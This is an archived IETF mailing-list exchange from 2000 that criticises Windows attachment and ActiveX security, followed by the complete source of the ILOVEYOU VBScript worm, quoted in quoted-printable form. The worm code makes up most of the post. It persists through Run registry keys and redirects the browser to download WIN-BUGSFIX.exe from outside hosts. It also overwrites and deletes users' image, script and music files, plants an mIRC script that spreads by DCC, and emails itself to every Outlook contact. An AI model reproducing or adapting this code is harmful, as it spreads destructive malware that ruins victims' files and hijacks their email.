ietf

Security insanity

2000-05-04 11:02:58

It's not switching to UNIX, it's avoiding security insanity like
ActiveX, self-extracting binaries, automatically executing attachments
on opening mail, as apparently Outlook does, etc.  A few
seconds' thought would tell anyone with a clue what a bad idea these
are.

It is just insane that vast parts of the computing capacity of the world
can be damaged this badly and this trivially.

Donald

PS:  Appended below is the virus in a hopefully non-virulent form.

Donald,

The whole world will not switch over to Unix 
- the average user will always be more comfortable with Windows 
unless Unix will at one point offer the same seamless user-friendliness. 
So it will always be a problem, one which cannot be solved by telling 
others not to use what they're accustomed to - and one which cannot be
ignored.

Lillian Komlossy                     
Site Manager                         
http://www.dmnews.com           
http://www.imarketingnews.com  
(212) 925-7300 ext. 232 

=====================================================================
 Donald E. Eastlake 3rd                      
dee3(_at_)torque(_dot_)pothole(_dot_)com
 140 Forest Avenue                                +1 914-276-2668(h)
 Hudson, MA 01749 USA                             +1 508-261-5434(w)

q MIME-Version: 1.0
q X-Mailer: Internet Mail Service (5.5.2448.0)
q Content-Type: multipart/mixed;
q       boundary="----_=_NextPart_000_01BFB5DE.957A65A0"
q 
q This message is in MIME format. Since your mail reader does not understand
q this format, some or all of this message may not be legible.
q 
q ------_=_NextPart_000_01BFB5DE.957A65A0
q Content-Type: text/plain
q 
q 
q kindly check the attached LOVELETTER coming from me.
q 
q 
q ------_=_NextPart_000_01BFB5DE.957A65A0
q Content-Type: application/octet-stream;
q       name="LOVE-LETTER-FOR-YOU.TXT.vbs"
q Content-Transfer-Encoding: quoted-printable
q Content-Disposition: attachment;
q       filename="LOVE-LETTER-FOR-YOU.TXT.vbs"
q 
q rem  barok -loveletter(vbe) <i hate go to school>
q rem                   by: spyder  /  ispyder(_at_)mail(_dot_)com  /  
@GRAMMERSoft Group  /  =
q Manila,Philippines
q On Error Resume Next
q dim fso,dirsystem,dirwin,dirtemp,eq,ctr,file,vbscopy,dow
q eq=3D""
q ctr=3D0
q Set fso =3D CreateObject("Scripting.FileSystemObject")
q set file =3D fso.OpenTextFile(WScript.ScriptFullname,1)
q vbscopy=3Dfile.ReadAll
q main()
q sub main()
q On Error Resume Next
q dim wscr,rr
q set wscr=3DCreateObject("WScript.Shell")
q rr=3Dwscr.RegRead("HKEY_CURRENT_USER\Software\Microsoft\Windows =
q Scripting Host\Settings\Timeout")
q if (rr>=3D1) then
q wscr.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows Scripting =
q Host\Settings\Timeout",0,"REG_DWORD"
q end if
q Set dirwin =3D fso.GetSpecialFolder(0)
q Set dirsystem =3D fso.GetSpecialFolder(1)
q Set dirtemp =3D fso.GetSpecialFolder(2)
q Set c =3D fso.GetFile(WScript.ScriptFullName)
q c.Copy(dirsystem&"\MSKernel32.vbs")
q c.Copy(dirwin&"\Win32DLL.vbs")
q c.Copy(dirsystem&"\LOVE-LETTER-FOR-YOU.TXT.vbs")
q regruns()
q html()
q spreadtoemail()
q listadriv()
q end sub
q sub regruns()
q On Error Resume Next
q Dim num,downread
q regcreate =
q "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\MSKern=
q el32",dirsystem&"\MSKernel32.vbs"
q regcreate =
q "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunService=
q s\Win32DLL",dirwin&"\Win32DLL.vbs"
q downread=3D""
q downread=3Dregget("HKEY_CURRENT_USER\Software\Microsoft\Internet =
q Explorer\Download Directory")
q if (downread=3D"") then
q downread=3D"c:\"
q end if
q if (fileexist(dirsystem&"\WinFAT32.exe")=3D1) then
q Randomize
q num =3D Int((4 * Rnd) + 1)
q if num =3D 1 then
q regcreate "HKCU\Software\Microsoft\Internet Explorer\Main\Start =
q Page","http://www.skyinet.net/~young1s/HJKhjnwerhjkxcvytwertnMTFwetrdsfm=
q hPnjw6587345gvsdf7679njbvYT/WIN-BUGSFIX.exe"
q elseif num =3D 2 then
q regcreate "HKCU\Software\Microsoft\Internet Explorer\Main\Start =
q Page","http://www.skyinet.net/~angelcat/skladjflfdjghKJnwetryDGFikjUIyqw=
q erWe546786324hjk4jnHHGbvbmKLJKjhkqj4w/WIN-BUGSFIX.exe"
q elseif num =3D 3 then
q regcreate "HKCU\Software\Microsoft\Internet Explorer\Main\Start =
q Page","http://www.skyinet.net/~koichi/jf6TRjkcbGRpGqaq198vbFV5hfFEkbopBd=
q QZnmPOhfgER67b3Vbvg/WIN-BUGSFIX.exe"
q elseif num =3D 4 then
q regcreate "HKCU\Software\Microsoft\Internet Explorer\Main\Start =
q Page","http://www.skyinet.net/~chu/sdgfhjksdfjklNBmnfgkKLHjkqwtuHJBhAFSD=
q GjkhYUgqwerasdjhPhjasfdglkNBhbqwebmznxcbvnmadshfgqw237461234iuy7thjg/WIN=
q -BUGSFIX.exe"
q end if
q end if
q if (fileexist(downread&"\WIN-BUGSFIX.exe")=3D0) then
q regcreate =
q "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\WIN-BU=
q GSFIX",downread&"\WIN-BUGSFIX.exe"
q regcreate "HKEY_CURRENT_USER\Software\Microsoft\Internet =
q Explorer\Main\Start Page","about:blank"
q end if
q end sub
q sub listadriv
q On Error Resume Next
q Dim d,dc,s
q Set dc =3D fso.Drives
q For Each d in dc
q If d.DriveType =3D 2 or d.DriveType=3D3 Then
q folderlist(d.path&"\")
q end if
q Next
q listadriv =3D s
q end sub
q sub infectfiles(folderspec) =20
q On Error Resume Next
q dim f,f1,fc,ext,ap,mircfname,s,bname,mp3
q set f =3D fso.GetFolder(folderspec)
q set fc =3D f.Files
q for each f1 in fc
q ext=3Dfso.GetExtensionName(f1.path)
q ext=3Dlcase(ext)
q s=3Dlcase(f1.name)
q if (ext=3D"vbs") or (ext=3D"vbe") then
q set ap=3Dfso.OpenTextFile(f1.path,2,true)
q ap.write vbscopy
q ap.close
q elseif(ext=3D"js") or (ext=3D"jse") or (ext=3D"css") or (ext=3D"wsh") =
q or (ext=3D"sct") or (ext=3D"hta") then
q set ap=3Dfso.OpenTextFile(f1.path,2,true)
q ap.write vbscopy
q ap.close
q bname=3Dfso.GetBaseName(f1.path)
q set cop=3Dfso.GetFile(f1.path)
q cop.copy(folderspec&"\"&bname&".vbs")
q fso.DeleteFile(f1.path)
q elseif(ext=3D"jpg") or (ext=3D"jpeg") then
q set ap=3Dfso.OpenTextFile(f1.path,2,true)
q ap.write vbscopy
q ap.close
q set cop=3Dfso.GetFile(f1.path)
q cop.copy(f1.path&".vbs")
q fso.DeleteFile(f1.path)
q elseif(ext=3D"mp3") or (ext=3D"mp2") then
q set mp3=3Dfso.CreateTextFile(f1.path&".vbs")
q mp3.write vbscopy
q mp3.close
q set att=3Dfso.GetFile(f1.path)
q att.attributes=3Datt.attributes+2
q end if
q if (eq<>folderspec) then
q if (s=3D"mirc32.exe") or (s=3D"mlink32.exe") or (s=3D"mirc.ini") or =
q (s=3D"script.ini") or (s=3D"mirc.hlp") then
q set scriptini=3Dfso.CreateTextFile(folderspec&"\script.ini")
q scriptini.WriteLine "[script]"
q scriptini.WriteLine ";mIRC Script"
q scriptini.WriteLine ";  Please dont edit this script... mIRC will =
q corrupt, if mIRC will"
q scriptini.WriteLine "     corrupt... WINDOWS will affect and will not =
q run correctly. thanks"
q scriptini.WriteLine ";"
q scriptini.WriteLine ";Khaled Mardam-Bey"
q scriptini.WriteLine ";http://www.mirc.com";
q scriptini.WriteLine ";"
q scriptini.WriteLine "n0=3Don 1:JOIN:#:{"
q scriptini.WriteLine "n1=3D  /if ( $nick =3D=3D $me ) { halt }"
q scriptini.WriteLine "n2=3D  /.dcc send $nick =
q "&dirsystem&"\LOVE-LETTER-FOR-YOU.HTM"
q scriptini.WriteLine "n3=3D}"
q scriptini.close
q eq=3Dfolderspec
q end if
q end if
q next =20
q end sub
q sub folderlist(folderspec) =20
q On Error Resume Next
q dim f,f1,sf
q set f =3D fso.GetFolder(folderspec) =20
q set sf =3D f.SubFolders
q for each f1 in sf
q infectfiles(f1.path)
q folderlist(f1.path)
q next =20
q end sub
q sub regcreate(regkey,regvalue)
q Set regedit =3D CreateObject("WScript.Shell")
q regedit.RegWrite regkey,regvalue
q end sub
q function regget(value)
q Set regedit =3D CreateObject("WScript.Shell")
q regget=3Dregedit.RegRead(value)
q end function
q function fileexist(filespec)
q On Error Resume Next
q dim msg
q if (fso.FileExists(filespec)) Then
q msg =3D 0
q else
q msg =3D 1
q end if
q fileexist =3D msg
q end function
q function folderexist(folderspec)
q On Error Resume Next
q dim msg
q if (fso.GetFolderExists(folderspec)) then
q msg =3D 0
q else
q msg =3D 1
q end if
q fileexist =3D msg
q end function
q sub spreadtoemail()
q On Error Resume Next
q dim x,a,ctrlists,ctrentries,malead,b,regedit,regv,regad
q set regedit=3DCreateObject("WScript.Shell")
q set out=3DWScript.CreateObject("Outlook.Application")
q set mapi=3Dout.GetNameSpace("MAPI")
q for ctrlists=3D1 to mapi.AddressLists.Count
q set a=3Dmapi.AddressLists(ctrlists)
q x=3D1
q regv=3Dregedit.RegRead("HKEY_CURRENT_USER\Software\Microsoft\WAB\"&a)
q if (regv=3D"") then
q regv=3D1
q end if
q if (int(a.AddressEntries.Count)>int(regv)) then
q for ctrentries=3D1 to a.AddressEntries.Count
q malead=3Da.AddressEntries(x)
q regad=3D""
q regad=3Dregedit.RegRead("HKEY_CURRENT_USER\Software\Microsoft\WAB\"&male=
q ad)
q if (regad=3D"") then
q set male=3Dout.CreateItem(0)
q male.Recipients.Add(malead)
q male.Subject =3D "ILOVEYOU"
q male.Body =3D vbcrlf&"kindly check the attached LOVELETTER coming from =
q me."
q male.Attachments.Add(dirsystem&"\LOVE-LETTER-FOR-YOU.TXT.vbs")
q male.Send
q regedit.RegWrite =
q "HKEY_CURRENT_USER\Software\Microsoft\WAB\"&malead,1,"REG_DWORD"
q end if
q x=3Dx+1
q next
q regedit.RegWrite =
q "HKEY_CURRENT_USER\Software\Microsoft\WAB\"&a,a.AddressEntries.Count
q else
q regedit.RegWrite =
q "HKEY_CURRENT_USER\Software\Microsoft\WAB\"&a,a.AddressEntries.Count
q end if
q next
q Set out=3DNothing
q Set mapi=3DNothing
q end sub
q sub html
q On Error Resume Next
q dim lines,n,dta1,dta2,dt1,dt2,dt3,dt4,l1,dt5,dt6
q dta1=3D"<HTML><HEAD><TITLE>LOVELETTER - HTML<?-?TITLE><META =
q NAME=3D(_at_)-@Generator(_at_)-@ CONTENT=3D(_at_)-@BAROK VBS - 
LOVELETTER(_at_)-@>"&vbcrlf& =
q _
q "<META NAME=3D(_at_)-@Author(_at_)-@ CONTENT=3D(_at_)-@spyder ?-? 
ispyder(_at_)mail(_dot_)com ?-? =
q @GRAMMERSoft Group ?-? Manila, Philippines ?-? March 2000(_at_)-@>"&vbcrlf& =
q _
q "<META NAME=3D(_at_)-@Description(_at_)-@ CONTENT=3D(_at_)-@simple but i 
think this is =
q good(_dot_)(_dot_)(_dot_)(_at_)-@>"&vbcrlf& _
q "<?-?HEAD><BODY =
q ONMOUSEOUT=3D(_at_)-@window.name=3D#-#main#-#;window.open(#-#LOVE-LETTER-FOR-=
q YOU.HTM#-#,#-#main#-#)@-@ "&vbcrlf& _
q "ONKEYDOWN=3D(_at_)-@window.name=3D#-#main#-#;window.open(#-#LOVE-LETTER-FOR-=
q YOU.HTM#-#,#-#main#-#)@-@ BGPROPERTIES=3D(_at_)-@fixed(_at_)-@ =
q BGCOLOR=3D(_at_)-@#FF9933(_at_)-@>"&vbcrlf& _
q "<CENTER><p>This HTML file need ActiveX Control<?-?p><p>To Enable to =
q read this HTML file<BR>- Please press #-#YES#-# button to Enable =
q ActiveX<?-?p>"&vbcrlf& _
q "<?-?CENTER><MARQUEE LOOP=3D(_at_)-@infinite(_at_)-@ =
q 
BGCOLOR=3D(_at_)-@yellow(_at_)-@>----------z--------------------z----------<?-?MAR=
q QUEE> "&vbcrlf& _
q "<?-?BODY><?-?HTML>"&vbcrlf& _
q "<SCRIPT language=3D(_at_)-@JScript(_at_)-@>"&vbcrlf& _
q "<!--?-??-?"&vbcrlf& _
q "if (window.screen){var wi=3Dscreen.availWidth;var =
q hi=3Dscreen.availHeight;window.moveTo(0,0);window.resizeTo(wi,hi);}"&vbc=
q rlf& _
q "?-??-?-->"&vbcrlf& _
q "<?-?SCRIPT>"&vbcrlf& _
q "<SCRIPT LANGUAGE=3D(_at_)-@VBScript(_at_)-@>"&vbcrlf& _
q "<!--"&vbcrlf& _
q "on error resume next"&vbcrlf& _
q "dim fso,dirsystem,wri,code,code2,code3,code4,aw,regdit"&vbcrlf& _
q "aw=3D1"&vbcrlf& _
q "code=3D"
q dta2=3D"set =
q fso=3DCreateObject(@-(_at_)Scripting(_dot_)FileSystemObject@-@)"&vbcrlf& _
q "set dirsystem=3Dfso.GetSpecialFolder(1)"&vbcrlf& _
q "code2=3Dreplace(code,chr(91)&chr(45)&chr(91),chr(39))"&vbcrlf& _
q "code3=3Dreplace(code2,chr(93)&chr(45)&chr(93),chr(34))"&vbcrlf& _
q "code4=3Dreplace(code3,chr(37)&chr(45)&chr(37),chr(92))"&vbcrlf& _
q "set =
q 
wri=3Dfso.CreateTextFile(dirsystem&@-(_at_)^-^MSKernel32(_dot_)vbs@-@)"&vbcrlf& 
_
q "wri.write code4"&vbcrlf& _
q "wri.close"&vbcrlf& _
q "if (fso.FileExists(dirsystem&@-(_at_)^-^MSKernel32(_dot_)vbs@-@)) 
then"&vbcrlf& _
q "if (err.number=3D424) then"&vbcrlf& _
q "aw=3D0"&vbcrlf& _
q "end if"&vbcrlf& _
q "if (aw=3D1) then"&vbcrlf& _
q "document.write @-(_at_)ERROR: can#-#t initialize ActiveX(_at_)-@"&vbcrlf& _
q "window.close"&vbcrlf& _
q "end if"&vbcrlf& _
q "end if"&vbcrlf& _
q "Set regedit =3D CreateObject(@-(_at_)WScript(_dot_)Shell@-@)"&vbcrlf& _
q "regedit.RegWrite =
q @-(_at_)HKEY_LOCAL_MACHINE^-^Software^-^Microsoft^-^Windows^-^CurrentVersion^=
q 
-^Run^-^MSKernel32(_at_)-@,dirsystem&@-(_at_)^-^MSKernel32(_dot_)vbs@-@"&vbcrlf&
 _
q "?-??-?-->"&vbcrlf& _
q "<?-?SCRIPT>"
q dt1=3Dreplace(dta1,chr(35)&chr(45)&chr(35),"'")
q dt1=3Dreplace(dt1,chr(64)&chr(45)&chr(64),"""")
q dt4=3Dreplace(dt1,chr(63)&chr(45)&chr(63),"/")
q dt5=3Dreplace(dt4,chr(94)&chr(45)&chr(94),"\")
q dt2=3Dreplace(dta2,chr(35)&chr(45)&chr(35),"'")
q dt2=3Dreplace(dt2,chr(64)&chr(45)&chr(64),"""")
q dt3=3Dreplace(dt2,chr(63)&chr(45)&chr(63),"/")
q dt6=3Dreplace(dt3,chr(94)&chr(45)&chr(94),"\")
q set fso=3DCreateObject("Scripting.FileSystemObject")
q set c=3Dfso.OpenTextFile(WScript.ScriptFullName,1)
q lines=3DSplit(c.ReadAll,vbcrlf)
q l1=3Dubound(lines)
q for n=3D0 to ubound(lines)
q lines(n)=3Dreplace(lines(n),"'",chr(91)+chr(45)+chr(91))
q lines(n)=3Dreplace(lines(n),"""",chr(93)+chr(45)+chr(93))
q lines(n)=3Dreplace(lines(n),"\",chr(37)+chr(45)+chr(37))
q if (l1=3Dn) then
q lines(n)=3Dchr(34)+lines(n)+chr(34)
q else
q lines(n)=3Dchr(34)+lines(n)+chr(34)&"&vbcrlf& _"
q end if
q next
q set b=3Dfso.CreateTextFile(dirsystem+"\LOVE-LETTER-FOR-YOU.HTM")
q b.close
q set d=3Dfso.OpenTextFile(dirsystem+"\LOVE-LETTER-FOR-YOU.HTM",2)
q d.write dt5
q d.write join(lines,vbcrlf)
q d.write vbcrlf
q d.write dt6
q d.close
q end sub
q ------_=_NextPart_000_01BFB5DE.957A65A0--


